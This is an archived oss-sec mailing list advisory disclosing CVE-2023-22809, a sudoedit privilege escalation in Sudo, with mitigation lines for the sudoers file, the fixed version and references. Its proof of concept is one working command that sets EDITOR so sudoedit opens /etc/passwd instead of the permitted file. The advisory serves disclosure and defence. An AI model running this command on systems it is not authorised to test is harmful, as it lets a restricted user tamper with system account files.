oss-sec logo

oss-sec
mailing list archives


From: Matthieu Barjole

Date: Thu, 19 Jan 2023 01:33:43 +0100


Hello everyone,

While auditing Sudo, Synacktiv identified a privilege escalation in sudoedit
when a user is authorized to use it by the sudoers policy. This
vulnerability
was assigned CVE-2023-22809 and affects Sudo versions 1.8.0 through 1.9.12p1
inclusive.

## Analysis

The technical analysis can be found in the following security advisory:
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf

## Proof of Concept

Assuming the following sudoers policy:

```
# cat /etc/sudoers
user ALL=(ALL:ALL) sudoedit /etc/motd
[...]
```

Arbitrary files such as `/etc/passwd` may also be edited as such:

```
EDITOR='vim -- /etc/passwd' sudoedit /etc/motd
```

## Mitigation

It is possible to prevent a user-specified editor from being used by
sudoedit by
adding the following line to the sudoers file.

```
Defaults!sudoedit   env_delete+="SUDO_EDITOR VISUAL EDITOR"
```

To restrict the editor when editing specific files, a Cmnd_Alias can be
used,
for example:

```
Cmnd_Alias          EDIT_MOTD = sudoedit /etc/motd
Defaults!EDIT_MOTD  env_delete+="SUDO_EDITOR VISUAL EDITOR"
user                ALL = EDIT_MOTD
```

## Fix

The issue was fixed in Sudo 1.9.12.p2.

## References

[1]
https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
[2] https://www.sudo.ws/security/advisories/sudoedit_any/
[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809

Current thread:

  • CVE-2023-22809: Sudoedit can edit arbitrary files Matthieu Barjole (Jan 18)

Read More